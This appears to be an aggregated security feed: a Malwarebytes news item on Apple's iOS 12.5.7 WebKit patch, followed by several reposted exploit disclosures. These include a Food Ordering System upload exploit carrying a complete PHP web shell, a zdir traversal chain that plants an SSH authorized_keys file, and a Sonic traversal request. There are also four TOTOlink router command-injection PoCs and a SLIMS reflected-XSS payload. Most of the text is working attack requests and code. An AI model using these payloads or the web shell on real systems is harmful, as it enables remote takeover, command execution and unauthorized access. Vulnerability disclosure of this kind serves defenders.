Categories: Apple
Categories: Exploits and vulnerabilities
Categories: News
Tags: iOS 12.5.7

Tags:  CVE-2022-42856

Tags:  type confusion

Tags:  WebKit

Apple has now released security content for iOS 12.5.7 which includes a patch for an actively exploited vulnerability in WebKit and many other updates.



(Read more...)




The post Own an older iPhone? Check you're on the latest version to avoid this bug appeared first on Malwarebytes Labs.

In December, 2022, we warned our readers about an actively exploited vulnerability in Apple’s WebKit. Back then we wondered why Apple specifically stated that the issue may have been actively exploited against versions of iOS released before iOS 15.1.

At the time, our resident Apple expert Thomas Reed said that Apple has been known to release fixes for older systems when it is aware of active attacks taking place. And indeed, Apple has now released security content for iOS 12.5.7. which includes a patch for this vulnerability.

**Affected devices**

The patch is available for: iPhone 5s, iPhone 6, iPhone 6 Plus, iPad Air, iPad mini 2, iPad mini 3, and iPod touch (6th generation).

The update may already have reached your device during your regular update routines, but it doesn't hurt to check if your device is at the latest update level.

Here's how to update your iPhone or iPad.

Since the vulnerability we’ll discuss below is already being exploited, it's important that you install the update your devices as soon as you can, if you haven’t already.

**The vulnerability**

The bug (CVE-2022-42856) was found in WebKit which is Apple’s web rendering engine. In other words, WebKit is the browser engine that powers Safari and other apps.

Apple says the impact of the vulnerability is that processing maliciously crafted web content may lead to arbitrary code execution. In essence this means an attacker can try to lure his victims to a malicious site to compromise their devices. But Apple has not disclosed any details about the circumstances under which the vulnerability was actively exploited.

**Other updates**

There is also new security content for  iOS 15.7.2 and iPadOS 15.7.2 and security updates for a lot of other Apple software.

Own an older iPhone? Check you're on the latest version to avoid this bug

Food Ordering System version 2 suffers from a remote shell upload vulnerability.

## Title: Food Ordering System v2 File upload Vulnerability + web-shell upload - RCE## Author: nu11secur1ty## Date: 01.23.2023## Vendor: https://github.com/oretnom23## Software: https://www.sourcecodester.com/php/16022/online-food-ordering-system-v2-using-php8-and-mysql-free-source-code.html## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2023/Food-Ordering-System-v2.0## Description:The Food Ordering System v2 suffers from, File Upload and web-shellupload RCE Vulnerabilities.The upload function for the background image hover of this system isnot sanitizing correctly.The attacker can upload some RCE malicious code and easily destroythis system. The status of this system is awful!## STATUS: HIGH Vulnerability[+] Exploit:```GETPOST /fos/admin/ajax.php?action=save_settings HTTP/1.1Host: pwnedhost.comContent-Length: 6157Accept: */*X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107Safari/537.36Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryqYQLHPx3VuntGH7WOrigin: http://pwnedhost.comReferer: http://pwnedhost.com/fos/admin/index.php?page=site_settingsAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=598nahp235ehmk2broafrh37qqConnection: close------WebKitFormBoundaryqYQLHPx3VuntGH7WContent-Disposition: form-data; name="name"Online Food Ordering System V2------WebKitFormBoundaryqYQLHPx3VuntGH7WContent-Disposition: form-data; name="email"info@sample.com------WebKitFormBoundaryqYQLHPx3VuntGH7WContent-Disposition: form-data; name="contact"+6948 8542 623------WebKitFormBoundaryqYQLHPx3VuntGH7WContent-Disposition: form-data; name="about"<p style="text-align: center; background: transparent; position:relative;"><span style="font-size:28px;background: transparent;position: relative;">ABOUT US</span></b></span></p><pstyle="text-align: center; background: transparent; position:relative;"><span style="background: transparent; position: relative;font-size: 14px;"><span style="font-size:28px;background: transparent;position: relative;"><b style="margin: 0px; padding: 0px; color:rgb(0, 0, 0); font-family: "Open Sans", Arial, sans-serif;text-align: justify;">Lorem Ipsum</b><span style="color: rgb(0, 0, 0);font-family: "Open Sans", Arial, sans-serif; font-weight:400; text-align: justify;">&nbsp;is simply dummy text of the printingand typesetting industry. Lorem Ipsum has been the industry&#x2019;sstandard dummy text ever since the 1500s, when an unknown printer tooka galley of type and scrambled it to make a type specimen book. It hassurvived not only five centuries, but also the leap into electronictypesetting, remaining essentially unchanged. It was popularised inthe 1960s with the release of Letraset sheets containing Lorem Ipsumpassages, and more recently with desktop publishing software likeAldus PageMaker including versions of LoremIpsum.</span><br></span></b></span></p><p style="text-align: center;background: transparent; position: relative;"><span style="background:transparent; position: relative; font-size: 14px;"><spanstyle="font-size:28px;background: transparent; position:relative;"><span style="color: rgb(0, 0, 0); font-family: "OpenSans", Arial, sans-serif; font-weight: 400; text-align:justify;"><br></span></b></span></p><p style="text-align: center;background: transparent; position: relative;"><span style="background:transparent; position: relative; font-size: 14px;"><spanstyle="font-size:28px;background: transparent; position:relative;"><h2 style="font-size:28px;background: transparent;position: relative;">Where does it come from?</h2><pstyle="text-align: center; margin-bottom: 15px; padding: 0px; color:rgb(0, 0, 0); font-family: "Open Sans", Arial, sans-serif;font-weight: 400;">Contrary to popular belief, Lorem Ipsum is notsimply random text. It has roots in a piece of classical Latinliterature from 45 BC, making it over 2000 years old. RichardMcClintock, a Latin professor at Hampden-Sydney College in Virginia,looked up one of the more obscure Latin words, consectetur, from aLorem Ipsum passage, and going through the cites of the word inclassical literature, discovered the undoubtable source. Lorem Ipsumcomes from sections 1.10.32 and 1.10.33 of "de Finibus Bonorum etMalorum" (The Extremes of Good and Evil) by Cicero, written in 45 BC.This book is a treatise on the theory of ethics, very popular duringthe Renaissance. The first line of Lorem Ipsum, "Lorem ipsum dolor sitamet..", comes from a line in section1.10.32.</p></span></b></span></p>------WebKitFormBoundaryqYQLHPx3VuntGH7WContent-Disposition: form-data; name="img"; filename="pic.php"Content-Type: image/jpeg<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><html>  <head>    <meta http-equiv="Content-Type" content="text/html" charset="euc-kr">    <title>PHP Web Shell Ver 4.0 by nu11secur1ty</title>    <script type="text/javascript">      function FocusIn(obj)      {        if(obj.value == obj.defaultValue)          obj.value = '';      }            function FocusOut(obj)      {        if(obj.value == '')          obj.value = obj.defaultValue;      }    </script>  </head>  <body>    <b>WebShell's Location = http://<?php echo $_SERVER['HTTP_HOST'];echo $_SERVER['REQUEST_URI'] ?></b><br><br>        HTTP_HOST = <?php echo $_SERVER['HTTP_HOST'] ?><br>    REQUEST_URI = <?php echo $_SERVER['REQUEST_URI'] ?><br>        <br>        <form name="cmd_exec" method="post" action="http://<?php echo$_SERVER['HTTP_HOST']; echo $_SERVER['REQUEST_URI'] ?>">      <input type="text" name="cmd" size="70" maxlength="500"value="Input command to execute"onfocus="FocusIn(document.cmd_exec.cmd)"onblur="FocusOut(document.cmd_exec.cmd)">      <input type="submit" name="exec" value="exec">    </form>    <?php      if(isset($_POST['exec']))      {        exec($_POST['cmd'],$result);        echo '----------------- < OutPut > -----------------';        echo '<pre>';        foreach($result as $print)        {          $print = str_replace('<','<',$print);          echo $print . '<br>';        }        echo '</pre>';      }      else echo '<br>';    ?>        <form enctype="multipart/form-data" name="file_upload" method="post"action="http://<?php echo $_SERVER['HTTP_HOST']; echo$_SERVER['REQUEST_URI'] ?>">      <input type="file" name="file">      <input type="submit" name="upload" value="upload"><br>      <input type="text" name="target" size="100" value="Location wherefile will be uploaded (include file name!)"onfocus="FocusIn(document.file_upload.target)"onblur="FocusOut(document.file_upload.target)">    </form>    <?php      if(isset($_POST['upload']))      {        $check = move_uploaded_file($_FILES['file']['tmp_name'], $_POST['target']);                if($check == TRUE)          echo '<pre>The file was uploaded successfully!!</pre>';        else          echo '<pre>File Upload was failed...</pre>';      }    ?>  </body></html>------WebKitFormBoundaryqYQLHPx3VuntGH7W--```[+] Response:```HTTPHTTP/1.1 200 OKDate: Mon, 23 Jan 2023 12:27:44 GMTServer: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/8.2.0X-Powered-By: PHP/8.2.0Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheContent-Length: 1Connection: closeContent-Type: text/html; charset=UTF-81```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2023/Food-Ordering-System-v2.0)## Reference:[href](https://portswigger.net/web-security/file-upload)## Proof and Exploit:[href](https://www.youtube.com/watch?v=t7RnRFnXTP4)## Proof and Exploit:[href](https://streamable.com/c026hq)## Time spent`01:00:00`

Food Ordering System 2 Shell Upload

An arbitrary file upload vulnerability in the /api/upload component of zdir v3.2.0 allows attackers to execute arbitrary code via a crafted .ssh file.

**The steps to reproduce.**

zdir version: 3.2.0

    git clone https://github.com/helloxz/zdir
    
    go run main.go init
    
    

modify file: /zdir/data/config/config.ini

start

View routes, the interface requires login credentials  

Enter the controller.Mkdir method, the parameters submitted by the post request are name and path  

Enter the !V\_dir method and find that it is only to judge whether the passed path is a folder

This creates a .ssh directory using directory traversal

    POST /api/dir/create HTTP/1.1
    Host: 127.0.0.1:6080
    Content-Length: 28
    sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="96"
    X-Token: 433a01baeaa6c37ef46f21621cc06f95
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
    Content-Type: application/x-www-form-urlencoded;charset=UTF-8
    Accept: application/json, text/plain, */*
    X-Cid: bPlNFG
    sec-ch-ua-platform: "Linux"
    Origin: http://127.0.0.1:6080
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Referer: http://127.0.0.1:6080/
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Cookie: USERNAME=admin; CID=bPlNFG; TOKEN=433a01baeaa6c37ef46f21621cc06f95
    Connection: close
    
    path=/../../../../&name=.ssh
    

Enter the controller.Upload method, you can specify the upload path  

There is a loophole in the regex to determine whether the path is legal, and you can use /../ to bypass it

Determine whether the folder exists, and terminate execution if it does not exist. So use the above directory traversal to create a folder, and then upload the file name without renaming it.  

    POST /api/upload HTTP/1.1
    Host: 127.0.0.1:6080
    Content-Length: 897
    sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="96"
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryqjo68lEJ6LlJ8zdA
    X-Token: 433a01baeaa6c37ef46f21621cc06f95
    X-Cid: bPlNFG
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
    sec-ch-ua-platform: "Linux"
    Accept: */*
    Origin: http://127.0.0.1:6080
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Referer: http://127.0.0.1:6080/
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Cookie: USERNAME=admin; CID=bPlNFG; TOKEN=433a01baeaa6c37ef46f21621cc06f95
    Connection: close
    
    ------WebKitFormBoundaryqjo68lEJ6LlJ8zdA
    Content-Disposition: form-data; name="path"
    
    /../../../../../../home/kali/.ssh
    ------WebKitFormBoundaryqjo68lEJ6LlJ8zdA
    Content-Disposition: form-data; name="file"; filename="authorized_keys"
    Content-Type: text/plain
    
    ssh-rsa
    
    ------WebKitFormBoundaryqjo68lEJ6LlJ8zdA--
    

Generate an ssh public key for upload  

Then you can use ssh to connect to the server

CVE-2023-23314: File upload ssh authorized_keys causes RCE · Issue #90 · helloxz/zdir

An issue in the component /admin/backups/work-dir of Sonic v1.0.4 allows attackers to execute a directory traversal.

Need to log in to the background  
Back up files in any directory through directory traversal

    POST /api/admin/backups/work-dir HTTP/1.1
    Host: 127.0.0.1:8080
    Content-Length: 35
    Admin-Authorization: 0996683e-0fab-46ec-936d-953d43be8048
    Accept: application/json, text/plain, */*
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
    sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="96"
    sec-ch-ua-platform: "Linux"
    Content-Type: application/json
    Origin: http://127.0.0.1:8080
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Referer: http://127.0.0.1:8080/admin/
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Connection: close
    
    ["../../../../home/kali/Documents"]

CVE-2022-46959: Back up files in any directory through directory traversal · Issue #56 · go-sonic/sonic

TOTOlink A7100RU V7.4cu.2313_B20191024 was discovered to contain a command injection vulnerability via the servername parameter in the setting/delStaticDhcpRules function.

**TOTOlink A7100RU(V7.4cu.2313\_B20191024)路由器存在命令注入漏洞****写在前面**

厂商信息：http://totolink.net/

固件下载地址：http://totolink.net/home/menu/detail/menu\_listtpl/download/id/185/ids/36.html

**1.影响版本**

图1为固件版本信息

**2.漏洞细节**

程序通过获取servername参数下的内容传递给v7，之后将v7带入到Uci\_Set\_Str函数中

在Uci\_Set\_Str函数中，通过snprintf函数，将a4匹配到的内容格式化进v11，之后将v11带入cstesystem函数中

函数直接将用户输入内容带入到execv函数中，存在命令注入漏洞

**POC**

POST /cgi\-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
Content\-Length: 79
Accept: \*/\*
X\-Requested\-With: XMLHttpRequest
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
Content\-Type: application/x\-www\-form\-urencoded; charset\=UTF\-8
Origin: <http://192.168.0.1>
Referer: <http://192.168.0.1/adm/status.asp?timestamp=1647872753309>
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q\=0.9
Cookie: SESSION\_ID\=2:1647872744:2
Connection: close

{"topicurl":"setting/delStaticDhcpRules",
"servername":"1$(ls>/tmp/123;)"}

复现结果如下

图2 POC攻击效果

最后，您可以编写exp，这可以实现获得根shell的非常稳定的效果

CVE-2022-48123: ttt/15 at main · Am1ngl/ttt

TOTOlink A7100RU V7.4cu.2313_B20191024 was discovered to contain a command injection vulnerability via the FileName parameter in the setting/setOpenVpnCertGenerationCfg function.

POST /cgi\-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
Content\-Length: 79
Accept: \*/\*
X\-Requested\-With: XMLHttpRequest
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
Content\-Type: application/x\-www\-form\-urencoded; charset\=UTF\-8
Origin: <http://192.168.0.1>
Referer: <http://192.168.0.1/adm/status.asp?timestamp=1647872753309>
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q\=0.9
Cookie: SESSION\_ID\=2:1647872744:2
Connection: close

{"topicurl":"setting/setOpenVpnCertGenerationCfg",
"FileName":"1$(ls>/tmp/123;)"}

CVE-2022-48124: ttt/14 at main · Am1ngl/ttt

TOTOlink A7100RU V7.4cu.2313_B20191024 was discovered to contain a command injection vulnerability via the password parameter in the setting/setOpenVpnCertGenerationCfg function.

**TOTOlink A7100RU(V7.4cu.2313\_B20191024)路由器存在命令注入漏洞****写在前面**

厂商信息：http://totolink.net/

固件下载地址：http://totolink.net/home/menu/detail/menu\_listtpl/download/id/185/ids/36.html

**1.影响版本**

图1为固件版本信息

**2.漏洞细节**

程序通过获取password参数下的内容传递给v26，之后将v26传递给v28，最后将v28带入到Uci\_Set\_Str函数中

在Uci\_Set\_Str函数中，通过snprintf函数，将a4匹配到的内容格式化进v11，之后将v11带入cstesystem函数中

函数直接将用户输入内容带入到execv函数中，存在命令注入漏洞

**POC**

POST /cgi\-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
Content\-Length: 79
Accept: \*/\*
X\-Requested\-With: XMLHttpRequest
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
Content\-Type: application/x\-www\-form\-urencoded; charset\=UTF\-8
Origin: <http://192.168.0.1>
Referer: <http://192.168.0.1/adm/status.asp?timestamp=1647872753309>
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q\=0.9
Cookie: SESSION\_ID\=2:1647872744:2
Connection: close

{"topicurl":"setting/setOpenVpnCertGenerationCfg",
"password":"1$(ls>/tmp/123;)"}

复现结果如下

图2 POC攻击效果

最后，您可以编写exp，这可以实现获得根shell的非常稳定的效果

CVE-2022-48125: ttt/13 at main · Am1ngl/ttt

TOTOlink A7100RU V7.4cu.2313_B20191024 was discovered to contain a command injection vulnerability via the username parameter in the setting/setOpenVpnCertGenerationCfg function.

**TOTOlink A7100RU(V7.4cu.2313\_B20191024)路由器存在命令注入漏洞****写在前面**

厂商信息：http://totolink.net/

固件下载地址：http://totolink.net/home/menu/detail/menu\_listtpl/download/id/185/ids/36.html

**1.影响版本**

图1为固件版本信息

**2.漏洞细节**

程序通过获取username参数中的内容传递给v51，之后将v51带入到Uci\_Set\_Str函数中

在Uci\_Set\_Str函数中，通过snprintf函数，将a4匹配到的内容格式化进v11，之后将v11带入cstesystem函数中

函数直接将用户输入内容带入到execv函数中，存在命令注入漏洞

**POC**

POST /cgi\-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
Content\-Length: 79
Accept: \*/\*
X\-Requested\-With: XMLHttpRequest
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
Content\-Type: application/x\-www\-form\-urencoded; charset\=UTF\-8
Origin: <http://192.168.0.1>
Referer: <http://192.168.0.1/adm/status.asp?timestamp=1647872753309>
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q\=0.9
Cookie: SESSION\_ID\=2:1647872744:2
Connection: close

{"topicurl":"setting/setOpenVpnCertGenerationCfg",
"username":"1$(ls>/tmp/123;)"}

复现结果如下

图2 POC攻击效果

最后，您可以编写exp，这可以实现获得根shell的非常稳定的效果

CVE-2022-48126: ttt/12 at main · Am1ngl/ttt

TOTOlink A7100RU V7.4cu.2313_B20191024 was discovered to contain a command injection vulnerability via the dayvalid parameter in the setting/delStaticDhcpRules function.

**TOTOlink A7100RU(V7.4cu.2313\_B20191024)路由器存在命令注入漏洞****写在前面**

厂商信息：http://totolink.net/

固件下载地址：http://totolink.net/home/menu/detail/menu\_listtpl/download/id/185/ids/36.html

**1.影响版本**

图1为固件版本信息

**2.漏洞细节**

程序通过获取dayvalid参数中的内容传递给v9，之后带入到Uci\_Set\_Str函数中

在Uci\_Set\_Str函数中，通过snprintf函数，将a4匹配到的内容格式化进v11，之后将v11带入cstesystem函数中

函数直接将用户输入内容带入到execv函数中，存在命令注入漏洞

**POC**

POST /cgi\-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
Content\-Length: 79
Accept: \*/\*
X\-Requested\-With: XMLHttpRequest
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
Content\-Type: application/x\-www\-form\-urencoded; charset\=UTF\-8
Origin: <http://192.168.0.1>
Referer: <http://192.168.0.1/adm/status.asp?timestamp=1647872753309>
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q\=0.9
Cookie: SESSION\_ID\=2:1647872744:2
Connection: close

{"topicurl":"setting/delStaticDhcpRules",
"dayvalid":"1$(ls>/tmp/123;)"}

复现结果如下

图2 POC攻击效果

最后，您可以编写exp，这可以实现获得根shell的非常稳定的效果

CVE-2022-48122: ttt/17 at main · Am1ngl/ttt

SLIMS version 9.5.2 suffers from a cross site scripting vulnerability.

    ## Title: SLIMS-9.5.2 - XSS Reflected - Account Exploit## Development: nu11secur1ty## Date: 01.19.2023## Vendor: https://slims.web.id/web/## Software: https://github.com/slims/slims9_bulian/releases/tag/v9.5.2## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.5.2## Description:The value of manual insertion `point 3` is copied into the HTMLdocument as plain text between tags.The payload udz21<script>alert(1)</script>rk346 was submitted inmanual insertion point 3.This input was echoed unmodified in the application's response.The attacker can trick the already logged-in user, to visit theexploit link that this attacker is created,and if this already logged-in user is not actually IT or admin, thiswill be the end of this system.## STATUS: HIGH Vulnerability[+] Exploit:```GET /slims9_bulian-9.5.2/admin/modules/reporting/customs/loan_by_class.php?reportView=true&year=2002&class=%27udz21%3Ca%20href=https://www.pornhub.com%3E%3Cimg%20src=https://i.postimg.cc/1tSM7Z7F/Hijacking-clipboard.gif%22%3E%50%6c%65%61%73%65%2c%20%76%69%73%69%74%20%6f%75%72%20%6d%61%69%6e%74%65%6e%61%6e%63%65%20%70%61%67%65%20%74%6f%20%63%68%65%63%6b%20%77%68%61%74%20%69%73%20%74%68%65%20%6c%61%74%65%73%74%20%6e%65%77%73%21%20%57%65%20%61%72%65%20%73%6f%72%72%79%20%66%6f%72%20%74%68%69%73%20%70%72%6f%62%6c%65%6d%21%20%54%68%69%73%20%77%69%6c%6c%20%62%65%20%66%69%78%65%64%20%73%6f%6f%6e&membershipType=a%27%27&collType=%27HTTP/1.1Host: pwnedhost1.comCache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: SenayanAdmin=qavdssnj7kgu5g8a7d1pm0l3rr; admin_logged_in=1;SenayanMember=8f7c68j2b0pgbovehqcfuhcnl4Connection: close```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.5.2)## Proof and Exploit:[href](https://streamable.com/zd6e18)## Reference:[href](https://portswigger.net/web-security/cross-site-scripting)

Tag

#webkit